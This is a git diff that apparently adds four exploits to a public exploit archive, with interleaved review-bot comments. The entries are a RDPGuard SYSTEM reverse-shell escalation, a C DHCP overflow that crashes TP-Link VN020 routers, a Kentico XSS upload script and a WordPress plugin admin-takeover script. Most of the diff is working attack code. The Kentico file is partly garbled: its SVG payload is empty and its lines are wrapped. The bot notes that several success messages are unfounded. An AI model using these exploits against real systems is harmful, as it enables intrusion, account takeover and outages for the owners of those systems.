diff --git a/exploits/multiple/local/52289.txt b/exploits/multiple/local/52289.txt
new file mode 100644
index 000000000..3223f7121
--- /dev/null
+++ b/exploits/multiple/local/52289.txt
@@ -0,0 +1,20 @@
+# Exploit Title: RDPGuard 9.9.9 - Privilege Escalation
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 09.05.2025
+# Vendor Homepage: https://rdpguard.com
+# Software Link: https://rdpguard.com/download.aspx
+# Tested Version: 9.9.9 (latest)
+# Tested on: Windows 10 (32bit)
+
+# # # Steps to Reproduce # # #
+
+# 1. Prepare a .bat file containing your reverse shell code.
+# 2. Open RDPGuard.
+# 3. Navigate to Tools > Custom Actions / Notifications.
+# 4. Click the "Add" button.
+# 5. Leave "Event" as "IP Blocked".
+# 6. Select "Execute Program" from the "Action" dropdown.
+# 7. Under the "Program/script" field, select your prepared .bat file.
+# 8. Set up your listener.
+# 9. Click "Test Run".
+# 10. A reverse shell as NT AUTHORITY\SYSTEM is obtained!
\ No newline at end of file
diff --git a/exploits/multiple/local/52292.c b/exploits/multiple/local/52292.c
new file mode 100644
index 000000000..9bd0139c1
--- /dev/null
+++ b/exploits/multiple/local/52292.c
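Review bot: The write-up in 52289.txt never says which account performs steps 2 to 9, so a reader cannot tell whether a privilege boundary is actually crossed. If opening the RDPGuard console and adding a custom action already requires an administrator, running a chosen program as NT AUTHORITY\SYSTEM is a much smaller step than the title suggests. I would add a header line such as `# Privileges required: <account type used to open the console - not stated in the report>` and one line for defenders, e.g. `# Mitigation: restrict who can open the RDPGuard console and audit configured "Execute Program" actions`. The header also says the test ran on Windows 10 while the file is filed under `multiple`, which is worth reconciling.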
@@ -0,0 +1,338 @@ +/* + * Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow + * Date: 10/20/2024 + * Exploit Author: Mohamed Maatallah + * Vendor Homepage: https://www.tp-link.com + * Version: TT_V6.2.1021 (VN020-F3v(T)) + * Tested on: VN020-F3v(T) Router (Hardware Version 1.0) + * CVE: CVE-2024-11237 + * Category: Remote + + * Technical Details: + * ----------------- + * - Triggers multiple memory corruption vectors in DHCP parsing + * - Primary vector: Stack overflow via oversized hostname (127 bytes) + * - Secondary vector: Parser confusion via malformed length fields + * - Tertiary vector: Vendor specific option parsing edge case + * + * Attack Surface: + * -------------- + * - DHCP service running on port 67 + * - Processes broadcast DISCOVER packets + * - No authentication required + * - Affects all routers running VN020 F3v(t) specifically the ones + * supplied by Tunisie Telecom & Topnet + * + * Exploitation Method: + * ------------------ + * 1. Sends crafted DHCP DISCOVER packet + * 2. Overflows hostname buffer (64 -> 127 bytes) + * 3. Corrupts length fields in DHCP options + * 4. Success = No response (service crash) + * + * Build: + * ------ + * Windows: cl poc.c /o tplink_dhcp.exe or use visual studio directly. 
+ * + * Usage: + * ------ + * tplink_dhcp.exe + +#define _WINSOCK_DEPRECATED_NO_WARNINGS +#include +#include +#include +#include +#include +#include + +#pragma comment(lib, "ws2_32.lib") + +// Standard DHCP ports - Server listens on 67, clients send from 68 +#define DHCP_SERVER_PORT 67 +#define DHCP_CLIENT_PORT 68 +#define MAX_PACKET_SIZE 1024 // Maximum size for DHCP packet +#define MAX_ATTEMPTS 3 + +// Forward declarations of functions +void create_dhcp_discover_packet(unsigned char* packet, int* packet_length); +void add_option(unsigned char* packet, int* offset, unsigned char option, + unsigned char length, unsigned char* data); +void tp_link(unsigned char* packet, int* offset); +void print_packet_hex(unsigned char* packet, int length); +int wait_for_response(SOCKET sock, int timeout); + +int main() { + WSADATA wsa; + SOCKET sock; + struct sockaddr_in dest; + unsigned char packet[MAX_PACKET_SIZE]; // Buffer for DHCP packet + int packet_length = 0; // Length of constructed packet + int attempts = 0; // Counter for send attempts + int success = 0; + + + printf("[TP-Thumper] Initializing Winsock...\n"); + if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) { + printf("[TP-Thumper] Winsock initialization failed. Error: %d\n", + WSAGetLastError()); + return 1; + } + + sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); + if (sock == INVALID_SOCKET) { + printf("[TP-Thumper] Could not create socket. 
Error: %d\n", + WSAGetLastError()); + WSACleanup(); + return 1; + } + + // Set up broadcast address (255.255.255.255) + dest.sin_family = AF_INET; + dest.sin_port = htons(DHCP_SERVER_PORT); + dest.sin_addr.s_addr = inet_addr("255.255.255.255"); + + // Enable broadcast mode on socket + BOOL broadcast = TRUE; + if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char*)&broadcast, + sizeof(broadcast)) < 0) { + printf("[TP-Thumper] Broadcast mode failed.\n"); + closesocket(sock); + WSACleanup(); + return 1; + } + + srand((unsigned int)time(NULL)); + + // Create the DHCP DISCOVER packet + create_dhcp_discover_packet(packet, &packet_length); + + // Main attempt loop - tries to send packet MAX_ATTEMPTS times + while (attempts < MAX_ATTEMPTS && !success) { + printf("[TP-Thumper] Sending DHCP Discover packet (Attempt %d/%d)...\n", + attempts + 1, MAX_ATTEMPTS); + print_packet_hex(packet, packet_length); //debug + + // Send the packet + if (sendto(sock, (char*)packet, packet_length, 0, (struct sockaddr*)&dest, + sizeof(dest)) < 0) { + printf("[TP-Thumper] Packet send failed. Error: %d\n", WSAGetLastError()); + } + else { + printf("[TP-Thumper] Packet sent. Waiting for router response...\n"); + if (wait_for_response(sock, 10)) { + printf( + "[TP-Thumper] Router responded! 
Exploit may not have succeeded.\n"); + success = 1; + } + else { + printf("[TP-Thumper] No response received within timeout.\n"); + } + } + attempts++; + } + if (!success) { + printf( + "[TP-Thumper] Exploit succeeded: No router response after %d " + "attempts.\n", + MAX_ATTEMPTS); + } + else { + printf("[TP-Thumper] Exploit failed: Router responded within timeout.\n"); + } + + // Cleanup + closesocket(sock); + WSACleanup(); + return 0; +} +/* + * DHCP Message Format: + * [0x00]: op = 0x01 ; BOOTREQUEST + * [0x01]: htype = 0x01 ; Ethernet + * [0x02]: hlen = 0x06 ; MAC addr len + * [0x03]: hops = 0x00 ; No relay + * [0x04-0x07]: xid ; Random transaction ID + * [0x08-0x0F]: secs + flags ; Broadcast flags set + * [0x10-0x1F]: ciaddr + yiaddr ; Empty + * [0x20-0x27]: siaddr + giaddr ; Empty + * [0x28-0x2D]: chaddr ; Crafted MAC + */ + +void create_dhcp_discover_packet(unsigned char* packet, int* packet_length) { + memset(packet, 0, MAX_PACKET_SIZE); + int offset = 0; + + // DHCP Header - Standard fields + packet[offset++] = 0x01; // BOOTREQUEST + packet[offset++] = 0x01; // Ethernet + packet[offset++] = 0x06; // MAC len + packet[offset++] = 0x00; // No hops + + // ; XID - rand() used for bypass of response filtering + // ; mov eax, rand() + // ; mov [packet + 4], eax + unsigned int xid = (unsigned int)rand(); + *((unsigned int*)&packet[offset]) = htonl(xid); + offset += 4; + + // ; Flags - Set broadcast bit to force response + // ; mov word [packet + 8], 0x0000 ; secs elapsed + // ; mov word [packet + 10], 0x8000 ; broadcast flag + packet[offset++] = 0x00; + packet[offset++] = 0x00; + packet[offset++] = 0x80; + packet[offset++] = 0x00; + + // Zero IP fields - forces DHCP server parse + memset(&packet[offset], 0, 16); + offset += 16; + + // ; Crafted MAC - DE:AD:BE:EF:00:01 + // ; Used for unique client tracking, bypasses MAC filters + packet[offset++] = 0xDE; + packet[offset++] = 0xAD; + packet[offset++] = 0xBE; + packet[offset++] = 0xEF; + packet[offset++] = 0x00; + 
packet[offset++] = 0x01; + memset(&packet[offset], 0x00, 10); + offset += 10; + + // ; Skip server name/boot filename + // ; Total padding: 192 bytes + memset(&packet[offset], 0x00, 64); + offset += 64; + memset(&packet[offset], 0x00, 128); + offset += 128; + + // ; DHCP Magic Cookie + // ; 0x63825363 = DHCP in natural order + packet[offset++] = 0x63; + packet[offset++] = 0x82; + packet[offset++] = 0x53; + packet[offset++] = 0x63; + + // ; Stack layout after this point: + // ; [ebp+0] = DHCP header + // ; [ebp+240] = DHCP options start + // ; Router parses sequentially from this point + add_option(packet, &offset, 0x35, 0x01, (unsigned char[]) { 0x01 }); + add_option(packet, &offset, 0x37, 4, + (unsigned char[]) { + 0x01, 0x03, 0x06, 0x0F + }); + + // ; Trigger overflow conditions + tp_link(packet, &offset); + + packet[offset++] = 0xFF; // End option + *packet_length = offset; +} + +void tp_link(unsigned char* packet, int* offset) { + // ; Vendor specific overflow - triggers parser state confusion + // ; 0x00,0x14,0x22 = TP-Link vendor prefix + // ; Following 0xFF bytes cause length validation bypass + unsigned char vendor_specific[] = { 0x00, 0x14, 0x22, 0xFF, 0xFF, 0xFF }; + add_option(packet, offset, 0x2B, sizeof(vendor_specific), vendor_specific); + + // ; Stack buffer overflow via hostname + // ; Router allocates 64-byte buffer but we send 127 + // ; Overwrites adjacent stack frame + unsigned char long_hostname[128]; + memset(long_hostname, 'A', sizeof(long_hostname) - 1); + long_hostname[127] = '\0'; + add_option(packet, offset, 0x0C, 127, long_hostname); + + // ; Length field exploit + // ; Claims 255 bytes but only sends 1 + // ; Router assumes full length during memory operations + // ; leads to read/write past buffer + add_option(packet, offset, 0x3D, 0xFF, (unsigned char[]) { 0x01 }); +} + +// ; Helper for DHCP option construction +// ; option = option code +// ; length = claimed length (can be falsified) +// ; data = actual payload + +void 
add_option(unsigned char* packet, int* offset, unsigned char option, + unsigned char length, unsigned char* data) { + packet[(*offset)++] = option; // Option type + packet[(*offset)++] = length; // Claimed length + memcpy(&packet[*offset], data, length); + *offset += length; +} + +// Debug +void print_packet_hex(unsigned char* packet, int length) { + printf("[TP-Thumper] Packet Hex Dump:\n"); + + // Print header fields with labels + printf("Opcode (op): %02X\n", packet[0]); + printf("Hardware Type (htype): %02X\n", packet[1]); + printf("Hardware Address Length (hlen): %02X\n", packet[2]); + printf("Hops: %02X\n", packet[3]); + + // Transaction ID + printf("Transaction ID (xid): "); + for (int i = 4; i < 8; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // Flags + printf("Flags: "); + for (int i = 10; i < 12; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // Client Hardware Address (MAC) + printf("Client Hardware Address (chaddr): "); + for (int i = 28; i < 34; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // DHCP Magic Cookie + printf("Magic Cookie: "); + for (int i = 236; i < 240; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // DHCP Options + printf("DHCP Options:\n"); + int i = 240; + while (i < length) { + printf(" Option: %02X, Length: %02X, Data: ", packet[i], packet[i + 1]); + int option_length = packet[i + 1]; + for (int j = 0; j < option_length; j++) { + printf("%02X ", packet[i + 2 + j]); + } + printf("\n"); + i += 2 + option_length; + if (packet[i] == 0xFF) { + printf(" End of Options\n"); + break; + } + } +} + +// Wait for router response with timeout +int wait_for_response(SOCKET sock, int timeout) { + struct timeval tv; + tv.tv_sec = timeout; + tv.tv_usec = 0; + + // Set up file descriptor set for select() + fd_set readfds; + FD_ZERO(&readfds); + FD_SET(sock, &readfds); + + // Wait for data or timeout + int result = select(0, &readfds, NULL, NULL, &tv); + return result > 0; // Returns true if 
data available
+}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52290.py b/exploits/multiple/webapps/52290.py
new file mode 100755
index 000000000..81fea1eb5
--- /dev/null
+++ b/exploits/multiple/webapps/52290.py
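Review bot: The verdict printed at the end of `main` in 52292.c treats silence as proof: `wait_for_response` returns 0 whenever no datagram reaches this socket, and the socket is never bound to `DHCP_CLIENT_PORT` (defined but unused in the visible code), so "Exploit succeeded" can be printed for a device that is not affected or not even present. The message should state only what was observed, e.g. `printf("[TP-Thumper] No reply observed in %d attempts; this alone does not show the device is affected.\n", MAX_ATTEMPTS);`. Separately, `add_option` copies `length` bytes from `data`, and the last call in `tp_link` passes 0xFF with a one-element array, so the sender reads past its own array (undefined behaviour) and broadcasts whatever memory follows it; a contract comment on `add_option` such as `/* data must point to at least length readable bytes */` would make that visible to whoever runs this. The header comment says "Category: Remote" while the file is added under `multiple/local` and indexed as `local`.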
@@ -0,0 +1,68 @@
+# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)
+# Date: 2025-05-09
+# Version: Kentico Xperience before 13.0.178
+# Exploit Author: Alex Messham
+# Contact: ramessham@gmail.com
+# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/
+# CVE: CVE-2025-32370
+
+import requests
+import subprocess
+import os
+import argparse
+
+def create_svg_payload(svg_filename: str):
+ print(f"[*] Writing malicious SVG to: {svg_filename}")
+ svg_payload = '''
+
+
+
+
+
+'''
+ with open(svg_filename, 'w') as f:
+ f.write(svg_payload)
+
+def zip_payload(svg_filename: str, zip_filename: str):
+ print(f"[*] Creating zip archive: {zip_filename}")
+ subprocess.run(['zip', zip_filename, svg_filename], check=True)
+
+def upload_zip(zip_filename: str, target_url: str):
+ full_url = f"{target_url}?Filename={zip_filename}&Complete=false"
+ headers = {
+ "Content-Type": "application/octet-stream"
+ }
+
+ print(f"[+] Uploading {zip_filename} to {full_url}")
+ with open(zip_filename, 'rb') as f:
+ response = requests.post(full_url, headers=headers, data=f,
+verify=False)
+
+ if response.status_code == 200:
+ print("[+] Upload succeeded")
+ else:
+ print(f"[-] Upload failed with status code {response.status_code}")
+ print(response.text)
+
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 -
+Unauthenticated ZIP file upload with embedded SVG for XSS.")
+ parser.add_argument("--url", required=True, help="Target upload URL
+(e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)")
+ parser.add_argument("--svg", default="poc.svc", help="SVG filename to
+embed inside the zip")
+ parser.add_argument("--zip", default="exploit.zip", help="Name of the
+output zip file")
+
+ args = parser.parse_args()
+
+ create_svg_payload(args.svg)
+ zip_payload(args.svg, args.zip)
+ upload_zip(args.zip, args.url)
+```
\ No newline at end of file
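Review bot: The file names two different identifiers for the same issue: the header comment says `# CVE: CVE-2025-32370`, which is also what the new index row in files_exploits.csv records, while the `argparse` description says `PoC for CVE-2025-2748`. One of the two has to be corrected so that anyone matching this entry against an advisory or a patch level lands on the right one. The file also ends with a stray markdown code fence, and several string literals and the `requests.post` call are wrapped mid-line, which suggests it was pasted from a wrapped or rendered copy; it should be re-checked against the repository linked in the `# Source:` line before it is archived.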
diff --git a/exploits/multiple/webapps/52291.py b/exploits/multiple/webapps/52291.py
new file mode 100755
index 000000000..8d9408c5c
--- /dev/null
+++ b/exploits/multiple/webapps/52291.py
@@ -0,0 +1,71 @@
+# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation
+# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/
+# Date: 2025-05-12
+# Exploit Author: Md Shoriful Islam (RootHarpy)
+# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/
+# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip
+# Version: <= 1.0.7
+# Tested on: Ubuntu 22.04 + WordPress 6.5.2
+# CVE : CVE-2025-3605
+
+import requests
+import argparse
+import sys
+
+def display_banner():
+ banner = """
+ _____ _____ ___ __ ___ ___ ____ __ __ ___
+ / __\ \ / / __|_|_ ) \_ ) __|__|__ / / / / \| __|
+| (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \
+ \___| \_/ |___| /___\__/___|___/ |___/\___/\__/|___/
+ """
+ print(banner)
+
+def suppress_ssl_warnings():
+ requests.packages.urllib3.disable_warnings()
+
+def initialize_session():
+ new_session = requests.Session()
+ new_session.verify = False
+ new_session.headers.update({'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"})
+ return new_session
+
+def parse_input_args():
+ parser = argparse.ArgumentParser(description="Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7")
+ parser.add_argument("--target", "-t", required=True, help="Target URL to exploit")
+ parser.add_argument("--target_user", "-u", default="1", help="User ID for target (default: 1)")
+ parser.add_argument("--new_email", "-e", default="example@gmail.com", help="Email to change to (default: example@gmail.com)")
+ return parser.parse_args()
+
+def generate_payload(user, email):
+ return {
+ 'action': 'flrblocksusersettingsupdatehandle',
+ 'user_id': user,
+ 'flr-blocks-email-update': email
+ }
+
+def execute_exploit(session, target_url, payload):
+ try:
+ return session.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload)
+ except Exception as error:
+ print(f"Request error: {error}")
+ sys.exit(1)
+
+def process_response(response):
+ if response.status_code == 200 and response.text.strip() != "0":
+ print(f"Exploit succeeded! Response: {response.text}")
+ print("Next: Go to the Forgot Password page and reset the admin password using the new email!")
+ else:
+ print(f"Exploit failed. HTTP Status: {response.status_code}, Response: {response.text}")
+
+def run_exploit():
+ display_banner()
+ suppress_ssl_warnings()
+ args = parse_input_args()
+ session = initialize_session()
+ payload = generate_payload(args.target_user, args.new_email)
+ response = execute_exploit(session, args.target, payload)
+ process_response(response)
+
+if __name__ == "__main__":
+ run_exploit()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 845f80054..8b57329d3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
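Review bot: `process_response` in 52291.py prints "Exploit succeeded!" for any HTTP 200 whose body is not "0", so a login page, a filtering proxy's block page or an error body from a fixed plugin version would all be counted as success. The message should describe only what was seen, e.g. `print(f"HTTP 200 with non-zero body (not proof of a change): {response.text}")`. `initialize_session` sets `verify = False` and `suppress_ssl_warnings` hides the resulting warning, so certificate checking is off with no trace in the output; a comment such as `# TLS certificate verification is disabled for this session` would make that explicit. The banner in `display_banner` is a plain triple-quoted string containing backslashes, which presumably produces invalid-escape warnings on current Python, and `banner = r"""` would avoid that. For defenders, the request built here is recognisable in access logs by the `action=flrblocksusersettingsupdatehandle` parameter posted to `/wp-admin/admin-ajax.php`.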
@@ -10568,6 +10568,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51983,exploits/multiple/local/51983.txt,"PrusaSlicer 2.6.1 - Arbitrary code execution",2024-04-12,"Kamil Breński",local,multiple,,2024-04-12,2024-04-12,0,,,,,,
 43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2016-0772,,,,,https://github.com/tintinweb/pub/tree/11f6ebda59ad878377df78351f8ab580660d0024/pocs/cve-2016-0772
 52190,exploits/multiple/local/52190.py,"qBittorrent 5.0.1 - MITM RCE",2025-04-11,"Jordan Sharp",local,multiple,,2025-04-11,2025-04-11,0,CVE-2024-51774,,,,,
+52289,exploits/multiple/local/52289.txt,"RDPGuard 9.9.9 - Privilege Escalation",2025-05-13,"Ahmet Ümit BAYRAM",local,multiple,,2025-05-13,2025-05-13,0,CVE-n/a,,,,,
 21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple,,2001-08-23,2012-09-05,1,CVE-2001-1003;OSVDB-11802,,,,,https://www.securityfocus.com/bid/3228/info
 47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-5899,,,,,https://github.com/bcoles/local-exploits/blob/3c5cd80a7c59ccd29a2c2a1cdbf71e0de8e66c11/CVE-2017-5899/exploit.sh
 49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,,2020-11-27,2020-11-27,0,,,,,,
@@ -10585,6 +10586,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 22732,exploits/multiple/local/22732.java,"Sun JRE/SDK 1.x - Untrusted Applet Java Security Model Violation",2003-06-05,"Marc Schoenefeld",local,multiple,,2003-06-05,2012-11-15,1,CVE-2003-1123;OSVDB-15151,,,,,https://www.securityfocus.com/bid/7824/info
 9973,exploits/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Local Privilege Escalation",2009-10-17,prdelka,local,multiple,,2009-10-16,,1,CVE-2009-3692,,,,,
 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,,2020-12-09,2020-12-09,0,,,,,,
+52292,exploits/multiple/local/52292.c,"TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow",2025-05-13,"Mohamed Maatallah",local,multiple,,2025-05-13,2025-05-13,0,CVE-2024-11237,,,,,
 19551,exploits/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
 19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
 11789,exploits/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,local,multiple,,2010-03-16,,1,OSVDB-63067,,,,,
@@ -12090,6 +12092,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24573,exploits/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting",2004-09-04,dr_insane,webapps,multiple,,2004-09-04,2013-03-04,1,,,,,,https://www.securityfocus.com/bid/11111/info
 36609,exploits/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",webapps,multiple,80,2015-04-02,2015-04-02,0,CVE-2014-7910;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;CVE-2014-6271;CVE-2014-5288;CVE-2014-5287;CVE-2014-3671;OSVDB-120255;CVE-2014-3659;OSVDB-120254;OSVDB-120253;OSVDB-120252;OSVDB-120251;OSVDB-120250;OSVDB-120249;OSVDB-112004,,,,,
 42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,,2017-05-30,2017-05-30,0,,,,,,
+52290,exploits/multiple/webapps/52290.py,"Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)",2025-05-13,"Alex Messham",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-32370,,,,,
 14629,exploits/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",webapps,multiple,80,2010-08-12,2010-09-08,0,OSVDB-67094,,,,,
 44487,exploits/multiple/webapps/44487.txt,"Kodi 17.6 - Persistent Cross-Site Scripting",2018-04-18,"Manuel García Cárdenas",webapps,multiple,,2018-04-18,2018-04-18,0,CVE-2018-8831,"Cross-Site Scripting (XSS)",,,,
 50521,exploits/multiple/webapps/50521.py,"KONGA 0.14.9 - Privilege Escalation",2021-11-15,"Fabricio Salomao",webapps,multiple,,2021-11-15,2021-11-15,0,,,,,http://www.exploit-db.comkonga-0.14.9.zip,
@@ -12494,6 +12497,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
 47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011
+52291,exploits/multiple/webapps/52291.py,"WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation",2025-05-13,"Md Shoriful Islam",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-3605,,,,,
 49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
 36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - SQL Injection",2015-05-07,"Felipe Molina",webapps,multiple,,2015-05-07,2015-05-07,0,OSVDB-121843,"WordPress Plugin",,,http://www.exploit-db.comfreshmail-newsletter.1.5.8.zip,